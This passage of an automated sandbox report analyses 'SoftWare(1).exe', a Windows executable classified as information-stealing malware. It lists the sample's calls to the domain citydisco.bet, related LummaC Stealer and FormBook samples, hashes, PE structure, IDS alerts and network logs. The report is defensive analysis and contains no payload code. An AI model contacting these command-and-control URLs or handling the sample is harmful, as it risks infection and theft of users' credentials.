                          • Avira URL Cloud: malware
                          unknown
                          https://duckduckgo.com/ac/?q=SoftWare(1).exe, 00000001.00000003.1157929492.0000000002FB8000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://citydisco.bet/gdJISenSoftWare(1).exe, 00000001.00000003.1242293904.0000000000537000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1241714804.0000000000537000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1271944869.0000000000537000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://citydisco.bet/gdJIShimaSoftWare(1).exe, 00000001.00000002.1326354243.000000000057E000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1317697438.000000000057C000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1291734425.000000000056F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://citydisco.bet/gdJISfbikFSoftWare(1).exe, 00000001.00000002.1326354243.000000000057E000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1242293904.0000000000537000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1241714804.0000000000537000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1271944869.0000000000537000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1317697438.000000000057C000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1291734425.000000000056F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SoftWare(1).exe, 00000001.00000003.1157929492.0000000002FB8000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://crl.rootca1.amazontrust.com/rootca1.crl0SoftWare(1).exe, 00000001.00000003.1211876234.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://ac.ecosia.org?q=SoftWare(1).exe, 00000001.00000003.1157929492.0000000002FB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://citydisco.bet:443/gdJIS;xSoftWare(1).exe, 00000001.00000003.1325657204.0000000000504000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000002.1326136884.0000000000504000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SoftWare(1).exe, 00000001.00000003.1157929492.0000000002FB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://ocsp.rootca1.amazontrust.com0:SoftWare(1).exe, 00000001.00000003.1211876234.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSoftWare(1).exe, 00000001.00000003.1213090592.00000000031C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://citydisco.bet/gdJIS2SoftWare(1).exe, 00000001.00000002.1326354243.0000000000599000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1317697438.0000000000599000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.google.com/images/branding/product/ico/googleg_alldp.icoSoftWare(1).exe, 00000001.00000003.1157929492.0000000002FB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.ecosia.org/newtab/v20SoftWare(1).exe, 00000001.00000003.1157929492.0000000002FB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://citydisco.bet/gdJISlSoftWare(1).exe, 00000001.00000002.1326354243.000000000057E000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1242293904.0000000000537000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1241714804.0000000000537000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1271944869.0000000000537000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1317697438.000000000057C000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1291734425.000000000056F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://citydisco.bet/SoftWare(1).exe, 00000001.00000002.1326354243.000000000057E000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1271713942.00000000005AA000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1317697438.000000000057C000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1291734425.000000000056F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://x1.c.lencr.org/0SoftWare(1).exe, 00000001.00000003.1211876234.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://x1.i.lencr.org/0SoftWare(1).exe, 00000001.00000003.1211876234.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://duckduckgo.com/chrome_newtabv20SoftWare(1).exe, 00000001.00000003.1157929492.0000000002FB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSoftWare(1).exe, 00000001.00000003.1157929492.0000000002FB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?SoftWare(1).exe, 00000001.00000003.1211876234.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://citydisco.bet/gdJISc1unSoftWare(1).exe, 00000001.00000003.1158240596.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1184616624.00000000005BA000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1184598646.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1184545093.00000000005A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://support.mozilla.org/products/firefoxgro.allSoftWare(1).exe, 00000001.00000003.1213090592.00000000031C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=SoftWare(1).exe, 00000001.00000003.1157929492.0000000002FB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://gemini.google.com/app?q=SoftWare(1).exe, 00000001.00000003.1157929492.0000000002FB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            188.114.97.3
                                                            citydisco.betEuropean Union
                                                            13335CLOUDFLARENETUSfalse
                                                            Joe Sandbox version:42.0.0 Malachite
                                                            Analysis ID:1636833
                                                            Start date and time:2025-03-13 07:44:10 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 5m 9s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:12
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:SoftWare(1).exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@3/0@1/1
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:
                                                            • Successful, ratio: 95%
                                                            • Number of executed functions: 22
                                                            • Number of non-executed functions: 171
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 2.16.185.191, 23.60.203.209, 172.202.163.200
                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            TimeTypeDescription
                                                            02:45:05API Interceptor7x Sleep call for process: SoftWare(1).exe modified
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            188.114.97.3RFQ- Italy.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                            • www.xploitation.net/sqjz/
                                                            Enquiry Quote - 21834-01.exeGet hashmaliciousFormBookBrowse
                                                            • www.joeyvv.xyz/b80n/
                                                            DcbI6OM1wO.exeGet hashmaliciousLokibot, PureLog Stealer, zgRATBrowse
                                                            • ddrtot.shop/New/PWS/fre.php
                                                            kVPzMgJglW.exeGet hashmaliciousFormBookBrowse
                                                            • www.timeinsardinia.info/j4nd/
                                                            tnZI8EzSx3.exeGet hashmaliciousFormBookBrowse
                                                            • www.braposaldesk.cyou/3it7/
                                                            zzSk99EqY0.exeGet hashmaliciousFormBookBrowse
                                                            • www.braposaldesk.cyou/3it7/
                                                            hh01FRs81x.exeGet hashmaliciousFormBookBrowse
                                                            • www.serenityos.dev/dntg/?R4lxS2-P=Xi77pNpzRwduTXf13DwoRl9ks24bE/OoZO8jI9GlbI12YargANeHXOwJPk3kluRPu8INtGeEgdhJoy+Tym0P0ZbjUAApu4gNis/FV3kbZJq8JK1mGA==&LL=4FHLH
                                                            QS1BxkXZoD.exeGet hashmaliciousFormBookBrowse
                                                            • www.fkrvhaupjtc.info/sdhm/
                                                            LmK9xpRW3B.exeGet hashmaliciousFormBookBrowse
                                                            • www.marposet.shop/6ixs/
                                                            ulQGCeP6wq.exeGet hashmaliciousFormBookBrowse
                                                            • www.braposaldesk.cyou/a5hz/
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            citydisco.betKiddion's Modest Menu v.1.0.0.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                                            • 188.114.96.3
                                                            Launcher_v2.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 188.114.96.3
                                                            ModMenu.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 188.114.96.3
                                                            SpaceCheatFort.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 188.114.97.3
                                                            Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 188.114.97.3
                                                            SpaceCheatFort.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 188.114.97.3
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            CLOUDFLARENETUShttps://ln.run/EYeFI#eWVjMDExNEBrb3JlYS5rcg==Get hashmaliciousHTMLPhisherBrowse
                                                            • 104.18.11.207
                                                            SecuriteInfo.com.Win32.DropperX-gen.28100.31863.exeGet hashmaliciousFormBookBrowse
                                                            • 172.67.222.160
                                                            1.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                                            • 172.67.166.76
                                                            http://dynamic-freesia-zv7h9k.mystrikingly.com/Get hashmaliciousUnknownBrowse
                                                            • 104.17.24.14
                                                            Kiddion's Modest Menu v.1.0.0.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                                            • 104.21.64.1
                                                            HitmanPro pre-patched.exeGet hashmaliciousUnknownBrowse
                                                            • 172.64.155.119
                                                            Launcher_v2.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 104.21.64.1
                                                            ModMenu.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 188.114.96.3
                                                            http://t.sidekickopen13.com/e1t/c/5/f18dQhb0SdYj8bGch0W2n0x6l2B9nMJW7t69v63MhV7MW63Bb-g16gGFkf4NFkQJ01?pi=008049cd-06c0-4d5f-a208-8c86b9c1059f&si=361705002&t=http%3A%2F%2Fwww.stikc.com%2FGet hashmaliciousUnknownBrowse
                                                            • 172.64.148.115
                                                            #U25b6#Ufe0fVoicemailjsisler@sweepingcorp.com.svgGet hashmaliciousGabagoolBrowse
                                                            • 172.67.143.150
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            a0e9f5d64349fb13191bc781f81f42e1Kiddion's Modest Menu v.1.0.0.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                                            • 188.114.97.3
                                                            Launcher_v2.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 188.114.97.3
                                                            ModMenu.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 188.114.97.3
                                                            SecuriteInfo.com.FileRepMalware.26489.28570.exeGet hashmaliciousUnknownBrowse
                                                            • 188.114.97.3
                                                            SecuriteInfo.com.FileRepMalware.26489.28570.exeGet hashmaliciousUnknownBrowse
                                                            • 188.114.97.3
                                                            SpaceCheatFort.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 188.114.97.3
                                                            Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 188.114.97.3
                                                            SpaceCheatFort.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 188.114.97.3
                                                            Aura.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 188.114.97.3
                                                            baseball-lineup-21.xlsGet hashmaliciousUnknownBrowse
                                                            • 188.114.97.3
                                                            No context
                                                            No created / dropped files found
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.567483092117933
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:SoftWare(1).exe
                                                            File size:775'488 bytes
                                                            MD5:82505c38e11c312f05b2891d330cf9c1
                                                            SHA1:232f8439df61af9b5ef164da0ea24120d866a93d
                                                            SHA256:36398113dbc31cc9ee99735f134cb246669c7f1f3932dba36628e24f12660246
                                                            SHA512:bb56a771e0f32d17cc111f18f0215fa431c5e549ca548be3d3dbd3b494f19893cbacb755b41e23643bc4a67868f0e78258b7941e069be61c19676c6d7875cecf
                                                            SSDEEP:12288:GIJQ/s2kiatVPnIpbWiJ621POPAANU/Sc+e1RoKq/T/+Kc5fBzBS0+I4d0Z2cdTQ:7BnIpnJhdQAANeNboz/aKc5fr3l4dzcq
                                                            TLSH:A1F4D046BC91D0B3E91628B14D29E7C50C6B6B604F20C4FBBED89D646FB76E08932357
                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g.............................w............@.......................................@.................................P...(..
                                                            Icon Hash:90cececece8e8eb0
                                                            Entrypoint:0x4377d2
                                                            Entrypoint Section:.text
                                                            Digitally signed:true
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x67D1BF1F [Wed Mar 12 17:06:39 2025 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:6
                                                            OS Version Minor:0
                                                            File Version Major:6
                                                            File Version Minor:0
                                                            Subsystem Version Major:6
                                                            Subsystem Version Minor:0
                                                            Import Hash:033c5f85fb620246315503dc218ebc8c
                                                            Signature Valid:false
                                                            Signature Issuer:CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                            Signature Validation Error:The digital signature of the object did not verify
                                                            Error Number:-2146869232
                                                            Not Before, Not After
                                                            • 15/12/2020 21:24:20 02/12/2021 21:24:20
                                                            Subject Chain
                                                            • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                            Version:3
                                                            Thumbprint MD5:31F605F0D1D4BA54250DA5C719A8200C
                                                            Thumbprint SHA-1:E8C15B4C98AD91E051EE5AF5F524A8729050B2A2
                                                            Thumbprint SHA-256:22A3C23E08C7DBB4E7F4591E58C04285C0514C2894E3C418AD157D817D7EDF3C
                                                            Serial:33000003DE8D56825AF1A4A9670000000003DE
                                                            Instruction
                                                            call 00007F1214DA8E0Ah
                                                            jmp 00007F1214DA8C79h
                                                            mov ecx, dword ptr [0045F840h]
                                                            push esi
                                                            push edi
                                                            mov edi, BB40E64Eh
                                                            mov esi, FFFF0000h
                                                            cmp ecx, edi
                                                            je 00007F1214DA8E06h
                                                            test esi, ecx
                                                            jne 00007F1214DA8E28h
                                                            call 00007F1214DA8E31h
                                                            mov ecx, eax
                                                            cmp ecx, edi
                                                            jne 00007F1214DA8E09h
                                                            mov ecx, BB40E64Fh
                                                            jmp 00007F1214DA8E10h
                                                            test esi, ecx
                                                            jne 00007F1214DA8E0Ch
                                                            or eax, 00004711h
                                                            shl eax, 10h
                                                            or ecx, eax
                                                            mov dword ptr [0045F840h], ecx
                                                            not ecx
                                                            pop edi
                                                            mov dword ptr [0045F880h], ecx
                                                            pop esi
                                                            ret
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 14h
                                                            lea eax, dword ptr [ebp-0Ch]
                                                            xorps xmm0, xmm0
                                                            push eax
                                                            movlpd qword ptr [ebp-0Ch], xmm0
                                                            call dword ptr [0045C860h]
                                                            mov eax, dword ptr [ebp-08h]
                                                            xor eax, dword ptr [ebp-0Ch]
                                                            mov dword ptr [ebp-04h], eax
                                                            call dword ptr [0045C820h]
                                                            xor dword ptr [ebp-04h], eax
                                                            call dword ptr [0045C81Ch]
                                                            xor dword ptr [ebp-04h], eax
                                                            lea eax, dword ptr [ebp-14h]
                                                            push eax
                                                            call dword ptr [0045C8A8h]
                                                            mov eax, dword ptr [ebp-10h]
                                                            lea ecx, dword ptr [ebp-04h]
                                                            xor eax, dword ptr [ebp-14h]
                                                            xor eax, dword ptr [ebp-04h]
                                                            xor eax, ecx
                                                            leave
                                                            ret
                                                            mov eax, 00004000h
                                                            ret
                                                            push 004614D0h
                                                            call dword ptr [0045C880h]
                                                            ret
                                                            push 00030000h
                                                            push 00010000h
                                                            push 00000000h
                                                            call 00007F1214DAF955h
                                                            add esp, 0Ch
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x5c6500x28.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xb90000x4540.bss
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x630000x276c.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x58b280x18.rdata
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x54f980xc0.rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x5c7c00x148.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x52cc00x52e00b955d299ddc749adb9e2a9fa46e5dda4False0.5095947633861236data6.772334323063753IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x540000xa1240xa200147c72eee2c66963ee69f82cf3610cb3False0.4244068287037037data4.908125312415663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0x5f0000x2c9c0x1600eab85ca8d24299491f287a6faf9660e1False0.4069602272727273data4.744736283390186IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .tls0x620000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .reloc0x630000x276c0x2800ed7d506be2e46b9b1c8fde31ac68b654False0.7849609375data6.600494306172883IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            .bss0x660000x57a000x57a0058eb524d477a379a759fa9c839345a92False1.0003231990014265data7.999466304037805IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            DLLImport
                                                            KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEndOfFile, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2025-03-13T07:45:05.250063+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449711188.114.97.3443TCP
                                                            2025-03-13T07:45:07.922627+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449712188.114.97.3443TCP
                                                            2025-03-13T07:45:10.660431+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449713188.114.97.3443TCP
                                                            2025-03-13T07:45:13.392736+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449716188.114.97.3443TCP
                                                            2025-03-13T07:45:16.380875+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449718188.114.97.3443TCP
                                                            2025-03-13T07:45:19.456440+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449720188.114.97.3443TCP
                                                            2025-03-13T07:45:22.058422+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449727188.114.97.3443TCP
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Mar 13, 2025 07:45:03.629244089 CET49711443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:03.629273891 CET44349711188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:03.629340887 CET49711443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:03.631851912 CET49711443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:03.631865978 CET44349711188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:05.249972105 CET44349711188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:05.250062943 CET49711443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:05.253195047 CET49711443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:05.253201962 CET44349711188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:05.253427982 CET44349711188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:05.294153929 CET49711443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:05.298106909 CET49711443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:05.298140049 CET49711443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:05.298216105 CET44349711188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:05.996345997 CET44349711188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:05.996386051 CET44349711188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:05.996423960 CET44349711188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:05.996452093 CET49711443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:05.996469975 CET44349711188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:05.996663094 CET49711443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:06.002970934 CET44349711188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:06.003067970 CET44349711188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:06.003118038 CET49711443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:06.003124952 CET44349711188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:06.009716988 CET44349711188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:06.009763002 CET44349711188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:06.009767056 CET49711443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:06.009773970 CET44349711188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:06.009818077 CET49711443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:06.016854048 CET44349711188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:06.016902924 CET44349711188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:06.016947031 CET49711443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:06.018908978 CET49711443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:06.018918991 CET44349711188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:06.136733055 CET49712443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:06.136778116 CET44349712188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:06.136857986 CET49712443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:06.137305021 CET49712443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:06.137319088 CET44349712188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:07.922533035 CET44349712188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:07.922626972 CET49712443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:07.926096916 CET49712443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:07.926106930 CET44349712188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:07.926395893 CET44349712188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:07.927611113 CET49712443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:07.927799940 CET49712443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:07.927833080 CET44349712188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:07.927900076 CET49712443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:07.927907944 CET44349712188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:08.757878065 CET44349712188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:08.757985115 CET44349712188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:08.758088112 CET49712443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:08.758336067 CET49712443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:08.758351088 CET44349712188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:08.931842089 CET49713443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:08.931870937 CET44349713188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:08.931973934 CET49713443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:08.932472944 CET49713443192.168.2.4188.114.97.3
